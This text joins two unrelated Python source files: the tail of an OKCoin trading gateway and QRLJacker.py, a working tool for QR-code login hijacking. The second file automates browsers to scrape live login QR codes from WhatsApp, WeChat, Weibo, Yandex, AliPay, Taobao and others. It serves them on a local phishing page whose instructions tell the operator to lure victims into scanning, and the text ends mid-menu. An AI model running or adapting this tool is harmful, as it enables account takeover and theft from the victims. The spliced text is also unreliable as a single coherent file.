self.subscribeFutureUserInfo()
self.subscribeFuturePositions()
# 返回合约信息
if self.currency == vnokcoin.CURRENCY_CNY:
l = self.generateCnyContract()
else:
l = self.generateUsdContract()
for contract in l:
contract.gatewayName = self.gatewayName
self.gateway.onContract(contract)
#----------------------------------------------------------------------
def writeLog(self, content):
"""快速记录日志"""
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = content
self.gateway.onLog(log)
#----------------------------------------------------------------------
def initCallback(self):
"""初始化回调函数"""
# USD_SPOT
self.cbDict['ok_sub_spotusd_btc_ticker'] = self.onTicker
self.cbDict['ok_sub_spotusd_ltc_ticker'] = self.onTicker
self.cbDict['ok_sub_spotusd_btc_depth_20'] = self.onDepth
self.cbDict['ok_sub_spotusd_ltc_depth_20'] = self.onDepth
self.cbDict['ok_spotusd_userinfo'] = self.onSpotUserInfo
self.cbDict['ok_spotusd_orderinfo'] = self.onSpotOrderInfo
self.cbDict['ok_sub_spotusd_userinfo'] = self.onSpotSubUserInfo
self.cbDict['ok_sub_spotusd_trades'] = self.onSpotSubTrades
self.cbDict['ok_spotusd_trade'] = self.onSpotTrade
self.cbDict['ok_spotusd_cancel_order'] = self.onSpotCancelOrder
# CNY_SPOT
self.cbDict['ok_sub_spotcny_btc_ticker'] = self.onTicker
self.cbDict['ok_sub_spotcny_ltc_ticker'] = self.onTicker
self.cbDict['ok_sub_spotcny_btc_depth_20'] = self.onDepth
self.cbDict['ok_sub_spotcny_ltc_depth_20'] = self.onDepth
self.cbDict['ok_spotcny_userinfo'] = self.onSpotUserInfo
self.cbDict['ok_spotcny_orderinfo'] = self.onSpotOrderInfo
self.cbDict['ok_sub_spotcny_userinfo'] = self.onSpotSubUserInfo
self.cbDict['ok_sub_spotcny_trades'] = self.onSpotSubTrades
self.cbDict['ok_spotcny_trade'] = self.onSpotTrade
self.cbDict['ok_spotcny_cancel_order'] = self.onSpotCancelOrder
# USD_FUTURES
#----------------------------------------------------------------------
def onTicker(self, data):
""""""
if 'data' not in data:
return
channel = data['channel']
symbol = channelSymbolMap[channel]
if symbol not in self.tickDict:
tick = VtTickData()
tick.symbol = symbol
tick.vtSymbol = symbol
tick.gatewayName = self.gatewayName
self.tickDict[symbol] = tick
else:
tick = self.tickDict[symbol]
rawData = data['data']
tick.highPrice = float(rawData['high'])
tick.lowPrice = float(rawData['low'])
tick.lastPrice = float(rawData['last'])
tick.volume = float(rawData['vol'].replace(',', ''))
#tick.date, tick.time = generateDateTime(rawData['timestamp'])
newtick = copy(tick)
self.gateway.onTick(newtick)
#----------------------------------------------------------------------
def onDepth(self, data):
""""""
if 'data' not in data:
return
channel = data['channel']
symbol = channelSymbolMap[channel]
if symbol not in self.tickDict:
tick = VtTickData()
tick.symbol = symbol
tick.vtSymbol = symbol
tick.gatewayName = self.gatewayName
self.tickDict[symbol] = tick
else:
tick = self.tickDict[symbol]
if 'data' not in data:
return
rawData = data['data']
tick.bidPrice1, tick.bidVolume1 = rawData['bids'][0]
tick.bidPrice2, tick.bidVolume2 = rawData['bids'][1]
tick.bidPrice3, tick.bidVolume3 = rawData['bids'][2]
tick.bidPrice4, tick.bidVolume4 = rawData['bids'][3]
tick.bidPrice5, tick.bidVolume5 = rawData['bids'][4]
tick.askPrice1, tick.askVolume1 = rawData['asks'][-1]
tick.askPrice2, tick.askVolume2 = rawData['asks'][-2]
tick.askPrice3, tick.askVolume3 = rawData['asks'][-3]
tick.askPrice4, tick.askVolume4 = rawData['asks'][-4]
tick.askPrice5, tick.askVolume5 = rawData['asks'][-5]
tick.date, tick.time = generateDateTime(rawData['timestamp'])
newtick = copy(tick)
self.gateway.onTick(newtick)
#----------------------------------------------------------------------
def onSpotUserInfo(self, data):
"""现货账户资金推送"""
rawData = data['data']
info = rawData['info']
funds = rawData['info']['funds']
# 持仓信息
for symbol in ['btc', 'ltc', self.currency]:
if symbol in funds['free']:
pos = VtPositionData()
pos.gatewayName = self.gatewayName
pos.symbol = symbol
pos.vtSymbol = symbol
pos.vtPositionName = symbol
pos.direction = DIRECTION_NET
pos.frozen = float(funds['freezed'][symbol])
pos.position = pos.frozen + float(funds['free'][symbol])
self.gateway.onPosition(pos)
# 账户资金
account = VtAccountData()
account.gatewayName = self.gatewayName
account.accountID = self.gatewayName
account.vtAccountID = account.accountID
account.balance = float(funds['asset']['net'])
self.gateway.onAccount(account)
#----------------------------------------------------------------------
def onSpotSubUserInfo(self, data):
"""现货账户资金推送"""
if 'data' not in data:
return
rawData = data['data']
info = rawData['info']
# 持仓信息
for symbol in ['btc', 'ltc', self.currency]:
if symbol in info['free']:
pos = VtPositionData()
pos.gatewayName = self.gatewayName
pos.symbol = symbol
pos.vtSymbol = symbol
pos.vtPositionName = symbol
pos.direction = DIRECTION_NET
pos.frozen = float(info['freezed'][symbol])
pos.position = pos.frozen + float(info['free'][symbol])
self.gateway.onPosition(pos)
#----------------------------------------------------------------------
def onSpotSubTrades(self, data):
"""成交和委托推送"""
if 'data' not in data:
return
rawData = data['data']
# 本地和系统委托号
orderId = str(rawData['orderId'])
localNo = self.orderIdDict[orderId]
# 委托信息
if orderId not in self.orderDict:
order = VtOrderData()
order.gatewayName = self.gatewayName
order.symbol = spotSymbolMap[rawData['symbol']]
order.vtSymbol = order.symbol
order.orderID = localNo
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
order.price = float(rawData['tradeUnitPrice'])
order.totalVolume = float(rawData['tradeAmount'])
order.direction, priceType = priceTypeMap[rawData['tradeType']]
self.orderDict[orderId] = order
else:
order = self.orderDict[orderId]
order.tradedVolume = float(rawData['completedTradeAmount'])
order.status = statusMap[rawData['status']]
self.gateway.onOrder(copy(order))
# 成交信息
if 'sigTradeAmount' in rawData and float(rawData['sigTradeAmount'])>0:
trade = VtTradeData()
trade.gatewayName = self.gatewayName
trade.symbol = spotSymbolMap[rawData['symbol']]
trade.vtSymbol = order.symbol
trade.tradeID = str(rawData['id'])
trade.vtTradeID = '.'.join([self.gatewayName, trade.tradeID])
trade.orderID = localNo
trade.vtOrderID = '.'.join([self.gatewayName, trade.orderID])
trade.price = float(rawData['sigTradePrice'])
trade.volume = float(rawData['sigTradeAmount'])
trade.direction, priceType = priceTypeMap[rawData['tradeType']]
trade.tradeTime = datetime.now().strftime('%H:%M:%S')
self.gateway.onTrade(trade)
#----------------------------------------------------------------------
def onSpotOrderInfo(self, data):
"""委托信息查询回调"""
rawData = data['data']
for d in rawData['orders']:
self.localNo += 1
localNo = str(self.localNo)
orderId = str(d['order_id'])
self.localNoDict[localNo] = orderId
self.orderIdDict[orderId] = localNo
if orderId not in self.orderDict:
order = VtOrderData()
order.gatewayName = self.gatewayName
order.symbol = spotSymbolMap[d['symbol']]
order.vtSymbol = order.symbol
order.orderID = localNo
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
order.price = d['price']
order.totalVolume = d['amount']
order.direction, priceType = priceTypeMap[d['type']]
self.orderDict[orderId] = order
else:
order = self.orderDict[orderId]
order.tradedVolume = d['deal_amount']
order.status = statusMap[d['status']]
self.gateway.onOrder(copy(order))
#----------------------------------------------------------------------
def generateSpecificContract(self, contract, symbol):
"""生成合约"""
new = copy(contract)
new.symbol = symbol
new.vtSymbol = symbol
new.name = symbol
return new
#----------------------------------------------------------------------
def generateCnyContract(self):
"""生成CNY合约信息"""
contractList = []
contract = VtContractData()
contract.exchange = EXCHANGE_OKCOIN
contract.productClass = PRODUCT_SPOT
contract.size = 1
contract.priceTick = 0.01
contractList.append(self.generateSpecificContract(contract, BTC_CNY_SPOT))
contractList.append(self.generateSpecificContract(contract, LTC_CNY_SPOT))
return contractList
#----------------------------------------------------------------------
def generateUsdContract(self):
"""生成USD合约信息"""
contractList = []
# 现货
contract = VtContractData()
contract.exchange = EXCHANGE_OKCOIN
contract.productClass = PRODUCT_SPOT
contract.size = 1
contract.priceTick = 0.01
contractList.append(self.generateSpecificContract(contract, BTC_USD_SPOT))
contractList.append(self.generateSpecificContract(contract, LTC_USD_SPOT))
# 期货
contract.productClass = PRODUCT_FUTURES
contractList.append(self.generateSpecificContract(contract, BTC_USD_THISWEEK))
contractList.append(self.generateSpecificContract(contract, BTC_USD_NEXTWEEK))
contractList.append(self.generateSpecificContract(contract, BTC_USD_QUARTER))
contractList.append(self.generateSpecificContract(contract, LTC_USD_THISWEEK))
contractList.append(self.generateSpecificContract(contract, LTC_USD_NEXTWEEK))
contractList.append(self.generateSpecificContract(contract, LTC_USD_QUARTER))
return contractList
#----------------------------------------------------------------------
def onSpotTrade(self, data):
"""委托回报"""
rawData = data['data']
orderId = rawData['order_id']
# 尽管websocket接口的委托号返回是异步的,但经过测试是
# 符合先发现回的规律,因此这里通过queue获取之前发送的
# 本地委托号,并把它和推送的系统委托号进行映射
localNo = self.localNoQueue.get_nowait()
self.localNoDict[localNo] = orderId
self.orderIdDict[orderId] = localNo
# 检查是否有系统委托号返回前就发出的撤单请求,若有则进
# 行撤单操作
if localNo in self.cancelDict:
req = self.cancelDict[localNo]
self.spotCancel(req)
del self.cancelDict[localNo]
#----------------------------------------------------------------------
def onSpotCancelOrder(self, data):
"""撤单回报"""
pass
#----------------------------------------------------------------------
def spotSendOrder(self, req):
"""发单"""
symbol = spotSymbolMapReverse[req.symbol][:4]
type_ = priceTypeMapReverse[(req.direction, req.priceType)]
self.spotTrade(symbol, type_, str(req.price), str(req.volume))
# 本地委托号加1,并将对应字符串保存到队列中,返回基于本地委托号的vtOrderID
self.localNo += 1
self.localNoQueue.put(str(self.localNo))
vtOrderID = '.'.join([self.gatewayName, str(self.localNo)])
return vtOrderID
#----------------------------------------------------------------------
def spotCancel(self, req):
"""撤单"""
symbol = spotSymbolMapReverse[req.symbol][:4]
localNo = req.orderID
if localNo in self.localNoDict:
orderID = self.localNoDict[localNo]
self.spotCancelOrder(symbol, orderID)
else:
# 如果在系统委托号返回前客户就发送了撤单请求,则保存
# 在cancelDict字典中,等待返回后执行撤单任务
self.cancelDict[localNo] = req
#----------------------------------------------------------------------
def generateDateTime(s):
"""生成时间"""
dt = datetime.fromtimestamp(float(s)/1e3)
time = dt.strftime("%H:%M:%S.%f")
date = dt.strftime("%Y%m%d")
return date, time
|
QRLJacker.py
|
#!/usr/bin/env python
#-*- encoding:utf-8 -*-
#Author: @D4Vinci
import base64 ,time ,os ,urllib ,sys ,threading
from binascii import a2b_base64
def clear():
if os.name == "nt":
os.system("cls")
else:
os.system("clear")
try:
from PIL import Image
import selenium, requests, configparser
from selenium import webdriver
except:
print "[*] Error Importing Exterinal Libraries"
print "[*] Trying install it using the requirements.txt file..\n"
try:
os.system("pip install -r requirements.txt")
except:
try:
#if python not in the path (In windows case)
os.system(str(sys.executable)+" -m pip install -r requirements.txt")
except:
print "[*] Failed installing the requirements [ Install it yourself :p ]"
exit()
finally:
from PIL import Image
import selenium
from selenium import webdriver
settings = configparser.ConfigParser()
def Serve_it(port=1337):
def serve(port):
if os.name=="nt":
try:
print " [*] Starting victim session on http://localhost:"+str(port)
os.system("python -m SimpleHTTPServer "+str(port)+" > NUL 2>&1")
except:
print " [*] Starting victim session on http://localhost:"+str(port)
#if python not in the path (In windows case)
os.system(str(sys.executable)+" -m SimpleHTTPServer "+str(port)+" > NUL 2>&1")
else:
print " [*] Starting victim session on http://localhost:"+str(port)
os.system("python -m SimpleHTTPServer "+str(port)+" > /dev/null 2>&1")
threading.Thread(target=serve,args=(port,)).start()
def create_driver():
try:
web = webdriver.Firefox()
print " [*] Opening Mozila FireFox..."
return web
except:
try:
web = webdriver.Chrome()
print " [*] We got some errors running Firefox, Opening Google Chrome instead..."
return web
except:
try:
web = webdriver.Opera()
print " [*] We got some errors running Chrome, Opening Opera instead..."
return web
except:
try:
web = webdriver.Edge()
print " [*] We got some errors running Opera, Opening Edge instead..."
return web
except:
try:
web = webdriver.Ie()
print " [*] We got some errors running Edge, Opening Internet Explorer instead..."
return web
except:
print " Error: \n Can not call any WebBrowsers\n Check your Installed Browsers!"
exit()
#Stolen from stackoverflow :D
def Screenshot(PicName ,location ,size):
img = Image.open(PicName)#screenshot.png
left = location['x']
top = location['y']
right = left + size['width']
bottom = top + size['height']
box = (int(left), int(top), int(right), int(bottom))
final = img.crop(box) # defines crop points
final.load()
final.save(PicName)
def whatsapp():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get('https://web.whatsapp.com/')
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
button = driver.find_element_by_class_name('qr-button')
print " [*] Idle detected, Reloading QR code image (Good job WhatsApp)..."
button._execute(webdriver.remote.command.Command.CLICK_ELEMENT)
time.sleep(5)
except:
pass
try:
img = driver.find_elements_by_tag_name('img')[0]
src = img.get_attribute('src').replace("data:image/png;base64,","")
print " [*] QR code image detected !"
print " [*] Downloading the image..."
binary_data = a2b_base64(src)
qr = open("tmp.png","wb")
qr.write(binary_data)
print " [*] Saved To tmp.png"
qr.close()
time.sleep(5)
continue
except:
break
#make("svg")
def Yandex():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("https://passport.yandex.com/auth?mode=qr")
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
img_url = "https://passport.yandex.com" + driver.find_element_by_class_name("qr-code__i").get_attribute("style").split("\"")[1].encode("utf-8")
print " [*] QR code image detected !"
data = urllib.urlopen(img_url).read()
print " [*] Downloading the image.."
f = open("tmp.svg","w").write(data)
print " [*] Saved To tmp.svg"
time.sleep(20)
if "yandex.com" in driver.current_url.encode("utf-8"):
if "mode=qr" not in driver.current_url.encode("utf-8"):
print " [*] Refreshing page..."
try:
driver.get("https://passport.yandex.com/auth?mode=qr")
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
continue
except:
break
def Airdroid():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("http://web.airdroid.com")
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
img_number = 16
refresh = 0
while True:
try:
button = driver.find_element_by_class_name("widget-login-refresh-qrcode")[0]
print " [*] Clicking to reload QR code image..."
button._execute(selenium.webdriver.remote.command.Command.CLICK_ELEMENT)
time.sleep(5)
except:
pass
try:
imgs = driver.find_elements_by_tag_name('img')
img = imgs[img_number]
print " [*] QR code image detected !"
src = img.get_attribute('src')
print " [*] Downloading the image.."
qr = urllib.urlretrieve(src, "tmp.png")
print " [*] Saved To tmp.png"
time.sleep(10)
if refresh == 0:
print " [*] Refreshing page..."
driver.refresh()
refresh = 1
img_number = 15
continue
except:
break
def Weibo():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("http://weibo.com/login.php")
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
imgs = driver.find_elements_by_tag_name('img')
img = imgs[len(imgs)-1]
print " [*] QR code image detected !"
src = img.get_attribute('src')
print " [*] Downloading the image.."
qr = urllib.urlretrieve(src, "tmp.png")
print " [*] Saved To tmp.png"
time.sleep(60)
print " [*] Refreshing page..."
driver.refresh()
continue
except:
break
def WeChat():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("https://web.wechat.com")
time.sleep(5)
except:
print " [*] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
iclass = driver.find_element_by_class_name('qrcode')[0]
img = iclass.find_elements_by_tag_name("img")[0]
print " [*] QR code image detected !"
src = img.get_attribute('src')
print " [*] Downloading the image.."
qr = urllib.urlretrieve(src, "tmp.png")
print " [*] Saved To tmp.png"
time.sleep(10)
continue
except:
break
def AliPay():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("https://auth.alipay.com/login/index.htm")
time.sleep(5)
except:
print " [*] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
c = driver.find_elements_by_class_name('ui-nav')[0]
button = c.find_elements_by_tag_name("li")[0]
print " [*] Clicking to show QR code image..."
button._execute(webdriver.remote.command.Command.CLICK_ELEMENT)
time.sleep(5)
except:
pass
try:
driver.save_screenshot('tmp.png') #screenshot entire page
img = driver.find_elements_by_tag_name("canvas")[0]
print " [*] QR code image detected !"
location = img.location
size = img.size
print " [*] Grabbing photo.."
Screenshot("tmp.png" ,location ,size)
print " [*] Saved To tmp.png"
time.sleep(60)
print " [*] Refreshing page..."
driver.refresh()
continue
except:
break
def Taobao():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("https://login.taobao.com")
time.sleep(5)
except:
print " [*] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
button_class = driver.find_element_by_class_name("msg-err")
button = button_class.find_elements_by_tag_name("a")[0]
print " [*] Clicking to reload QR code image..."
button._execute(webdriver.remote.command.Command.CLICK_ELEMENT)
time.sleep(5)
except:
pass
try:
imgs = driver.find_elements_by_tag_name('img')
img = imgs[0]
print " [*] QR code image detected !"
src = img.get_attribute('src')
print " [*] Downloading the image.."
qr = urllib.urlretrieve(src, "tmp.png")
print " [*] Saved To tmp.png"
time.sleep(10)
continue
except:
break
def mydigipass():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("https://www.mydigipass.com/en/fp/signin/smartphone/qr")
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
imgs = driver.find_elements_by_tag_name('img')
img = imgs[1]
print " [*] QR code image detected !"
src = img.get_attribute('src')
print " [*] Downloading the image.."
qr = urllib.urlretrieve(src, "tmp.png")
print " [*] Saved To tmp.png"
time.sleep(20)
print " [*] Refreshing page..."
driver.refresh()
continue
except:
break
def Zapper():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("https://www.zapper.com/login.php")
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
img = driver.find_elements_by_tag_name("img")[3]
print " [*] QR code image detected !"
src = img.get_attribute('src')
print " [*] Downloading the image.."
qr = urllib.urlretrieve(src, "tmp.png")
print " [*] Saved To tmp.png"
time.sleep(20)
except:
break
def Trustly_App():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("https://trustlyapp.com/backend")
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
c = driver.find_elements_by_class_name("qrcode-tab")[0]
img = c.find_elements_by_tag_name("img")[0]
print " [*] QR code image detected !"
src = img.get_attribute('src')
print " [*] Downloading the image.."
qr = urllib.urlretrieve(src, "tmp.png")
print " [*] Saved To tmp.png"
time.sleep(60)
continue
except:
break
def Yelophone():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("https://www.yelophone.com/app#/login")
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
c = driver.find_elements_by_id("qrcode")[0]
print " [*] QR code image detected !"
src = c.get_attribute("src")
print " [*] Downloading the image.."
qr = open("tmp.png","wb").write( requests.get( c.get_attribute("src") ).content )
print " [*] Saved To tmp.png"
time.sleep(60)
continue
except:
break
def make( service_name , port , type="html" ):
if type == "html":
code = """<html>
<head>
<title>"""+str(service_name)+"""</title>
</head>
<body>
<script>
var myTimer; myTimer = window.setInterval(reloadD,3000);
function reloadD(){ d = new Date(); document.getElementById('qrcodew').src="tmp.png?h="+d.getTime();}
</script>
<center><h1><b>QRLJacker: """+str(service_name)+"""</b></h1>
Now you have a local webserver hosting your QRLJacking payload, Here's some instructions to be done:
</br>1. This is your always updated """+str(service_name)+""" QR Code
</b><img id="qrcodew" alt="Scan me!" src="tmp.png" style="display: block;">
</br>2. Edit Index.html by adding your phishing page source code, style, resources, etc.. ("Index.html" located in the framework folder)
</br>3. Point your victim to your phishing <a href='http://localhost:"""+str(port)+"""'>URL</a>, Convince to scan the QR code and Bob is your uncle!
</center>
</body>
</html>"""
if type == "svg":
code = """<html>
<head>
<title>"""+str(service_name)+"""</title>
</head>
<body>
<script>
var myTimer; myTimer = window.setInterval(reloadD,3000);
function reloadD(){ d = new Date(); document.getElementById('qrcodew').src="tmp.svg?h="+d.getTime();}
</script>
<center><h1><b>QRLJacker: """+str(service_name)+"""</b></h1>
Now you have a local webserver hosting your QRLJacking payload, Here's some instructions to be done:
</br>1. This is your always updated """+str(service_name)+""" QR Code
</b><img id="qrcodew" alt="Scan me!" src="tmp.svg" style="display: block;">
</br>2. Edit Index.html by adding your phishing page source code, style, resources, etc.. ("Index.html" located in the framework folder)
</br>3. Point your victim to your phishing <a href='http://localhost:"""+str(port)+"""'>URL</a>, Convince to scan the QR code and Bob is your uncle!
</center>
</body>
</html>"""
f = open("index.html","w")
f.write(code)
f.close()
def Add_website():
print " 1.Find image by class and its number method"
print " 2.Find image by its number only method"
print " 3.Find image by the screenshot method"
print " 00.Back To Main Menu"
method = raw_input("\n Note: Customization doesn\'t support svg images for now\n Select method > ")
if method == "00":
main()
elif int(method) == 1:
classname = raw_input(" Classname > ")
url = raw_input(" Url > ")
image_number = int( raw_input(" Image Number > ") )
Seconds = raw_input(" Refresh every (Default 10s) > ")
try:
int(Seconds)
except:
Seconds = 10
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
print " [*] Saving settings..."
settings.read(os.path.join('Data', 'Custom.ini'))
name = url.replace("http://","").replace("https://","").split("/")[0]
settings.add_section(name)
settings.set(name,"method","1")
settings.set(name,"classname",classname)
settings.set(name,"url",url)
settings.set(name,"image_number",str(image_number))
settings.set(name,"Seconds",str(Seconds))
settings.write(open(os.path.join('Data', 'Custom.ini'),"wb"))
clear()
print " [*] Settings saved."
print " [*] Running the exploit..."
print "="*12
make( name , port )
Serve_it(port)
First_Method(classname,url,image_number,Seconds)
main()
elif int(method) == 2:
url = raw_input(" Url > ")
image_number = int( raw_input(" Image Number > ") )
Seconds = raw_input(" Refresh every (Default 10s) > ")
try:
int(Seconds)
except:
Seconds = 10
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int( port )
except ValueError:
port = 1337
print " [*] Saving settings..."
settings.read(os.path.join('Data', 'Custom.ini'))
name = url.replace("http://","").replace("https://","").split("/")[0]
settings.add_section(name)
settings.set(name,"method","2")
settings.set(name,"url",url)
settings.set(name,"image_number",str(image_number))
settings.set(name,"Seconds",str(Seconds))
settings.write(open(os.path.join('Data', 'Custom.ini'),"wb"))
clear()
print " [*] Settings saved."
print " [*] Running the exploit..."
print "="*12
make( name , port )
Serve_it( port )
Second_Method( url , image_number , Seconds )
main()
elif int(method) == 3:
url = raw_input(" Url > ")
image_number = int( raw_input(" Image Number (To get its width and location)> ") )
Seconds = raw_input(" Refresh every (Default 10s) > ")
try:
int(Seconds)
except:
Seconds = 10
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int( port )
except ValueError:
port = 1337
print " [*] Saving settings..."
settings.read(os.path.join('Data', 'Custom.ini'))
name = url.replace("http://","").replace("https://","").split("/")[0]
settings.add_section(name)
settings.set(name,"method","3")
settings.set(name,"url",url)
settings.set(name,"image_number",str(image_number))
settings.set(name,"Seconds",str(Seconds))
settings.write(open(os.path.join('Data', 'Custom.ini'),"wb"))
clear()
print " [*] Settings saved."
print " [*] Running the exploit..."
print "="*12
make( name , port )
Serve_it( port )
Third_Method( url , image_number , Seconds )
main()
else:
main()
def Use_website():
settings.read(os.path.join('Data', 'Custom.ini'))
print "\n"
for n,w in enumerate(settings.sections()):
print " "+str(n)+"."+w.encode("utf-8")
print " 00.Back To Main Menu"
website = raw_input("\n Select website > ")
websites = settings.sections()
if website == "00":
main()
try:
section = websites[int(website)]
except:
Use_website()
method = int( settings.get(section,"method") )
if int(method) == 1:
classname = settings.get(section,"classname")
url = settings.get(section,"url")
image_number = settings.get(section,"image_number")
Seconds = settings.get(section,"Seconds")
First_Method(classname,url,image_number,Seconds)
main()
elif int(method) == 2:
url = settings.get(section,"url")
image_number = settings.get(section,"image_number")
Seconds = settings.get(section,"Seconds")
Second_Method(url,image_number,Seconds)
main()
elif int(method) == 3:
url = settings.get(section,"url")
image_number = settings.get(section,"image_number")
Seconds = settings.get(section,"Seconds")
Third_Method(url,image_number,Seconds)
main()
else:
Use_website()
def Remove_website():
settings.read(os.path.join('Data', 'Custom.ini'))
print "\n"
for n,w in enumerate(settings.sections()):
print " "+str(n)+"."+w.encode("utf-8")
print " 00.Back To Main Menu"
website = raw_input("\n Select website > ")
websites = settings.sections()
if website == "00":
main()
try:
section = websites[int(website)]
except:
Remove_website()
settings.remove_section(section)
print " [*] Website removed."
time.sleep(5)
main()
def First_Method(classname,url,image_number,s=10):
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get(url)
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
login = driver.find_element_by_class_name(classname)
img = login.find_elements_by_tag_name('img')[int(image_number)]
print " [*] QR code image detected !"
src = img.get_attribute('src')
print " [*] Downloading the image.."
qr = urllib.urlretrieve(src, "tmp.png")
print " [*] Saved To tmp.png"
time.sleep(s)
print " [*] Refreshing page..."
driver.refresh()
continue
except:
break
def Second_Method(url,image_number,s=10):
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get(url)
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
imgs = driver.find_elements_by_tag_name('img')
img = imgs[int(image_number)]
print " [*] QR code image detected !"
src = img.get_attribute('src')
print " [*] Downloading the image.."
qr = urllib.urlretrieve(src, "tmp.png")
print " [*] Saved To tmp.png"
time.sleep(s)
print " [*] Refreshing page..."
driver.refresh()
continue
except:
break
def Third_Method(url,image_number,s=10):
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get(url)
time.sleep(10)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
driver.save_screenshot('tmp.png') #screenshot entire page
img = driver.find_elements_by_tag_name("img")[int(image_number)]
print " [*] QR code image detected !"
location = img.location
size = img.size
print " [*] Grabbing photo.."
Screenshot("tmp.png" ,location ,size)
print " [*] Saved To tmp.png"
time.sleep(s)
print " [*] Refreshing page..."
driver.refresh()
continue
except:
break
def main():
clear()
print """
____ _____ _ _ _
/ __ \| __ \| | | | | |
| | | | |__) | | | | __ _ ___| | _____ _ __
| | | | _ /| | _ | |/ _` |/ __| |/ / _ \ '__|
| |__| | | \ \| |___| |__| | (_| | (__| < __/ |
\___\_\_| \_\______\____/ \__,_|\___|_|\_\___|_|
#QRLJacker is a customizable framework to demonstrate "QRLJacking Attack Vector" and shows How easy to hijack services that relies on QR Code Authentication!
#A Social Engineering Attack Vector by: Mohamed A. Baset (@SymbianSyMoh)
#Coded by: Karim Shoair (@D4Vinci)
Vulnerable Web Applications and Services:
1.Chat Applications
2.Mailing Services
3.eCommerce
4.Online Banking
5.Passport Services
6.Mobile Management Software
7.Other Services
8.Customization
9.Exit
"""
choice = raw_input(" Choice > ")
if not choice.isdigit():
main()
else:
choice = int(choice)
#Chat Applications
if choice == 9:
exit()
if choice == 1:
print """
1.WhatsApp
2.WeChat
3.Weibo
00.Back To Main Menu
"""
choice_2 = raw_input("\n Second Choice > ")
if choice_2 == "00":
main()
#Whatsapp
elif int(choice_2) == 1:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Whatsapp" , port )
Serve_it(port)
whatsapp()
main()
#Wechat
elif int(choice_2) == 2:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "WeChat" , port )
Serve_it(port)
WeChat()
main()
#Weibo
elif int(choice_2) == 3:
port = raw_input(" Port to listen on (Default 1337) : ")
if port == "":port = 1337
clear()
make( "Weibo" , port )
Serve_it(port)
Weibo()
main()
else:
main()
#Mailing Services
if choice == 2:
print """
1.Yandex Mail
00.Back To Main Menu
"""
choice_2 = raw_input("\n Second Choice > ")
if choice_2 == "00":
main()
#Yandex Mail
elif int(choice_2) == 1:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Yandex" , port , "svg")
Serve_it(port)
Yandex()
main()
else:
main()
#eCommerce
if choice == 3:
print """
1.Taobao
2.Taobao Trips
00.Back To Main Menu
"""
choice_2 = raw_input("\n Second Choice > ")
if choice_2 == "00":
main()
#Taobao
elif int(choice_2) == 1:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Taobao" , port )
Serve_it(port)
Taobao()
main()
#Taobao Trips
elif int(choice_2) == 2:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Taobao Trips" , port )
Serve_it(port)
Taobao()
main()
else:
main()
#Online Banking
if choice == 4:
print """
1.AliPay
2.Yandex Money
00.Back To Main Menu
"""
choice_2 = raw_input("\n Second Choice > ")
if choice_2 == "00":
main()
#AliPay
elif int(choice_2) == 1:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "AliPay" , port )
Serve_it(port)
AliPay()
main()
#Yandex Money
elif int(choice_2) == 2:
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
if port == "":
port = 1337
clear()
make( "Yandex Money" , port , "svg")
Serve_it(port)
Yandex()
main()
else:
main()
#Passport Services
if choice == 5:
print """
1.Yandex Passport
00.Back To Main Menu
"""
choice_2 = raw_input("\n Second Choice > ")
if choice_2 == "00":
main()
#Yandex Passport
elif int(choice_2) == 1:
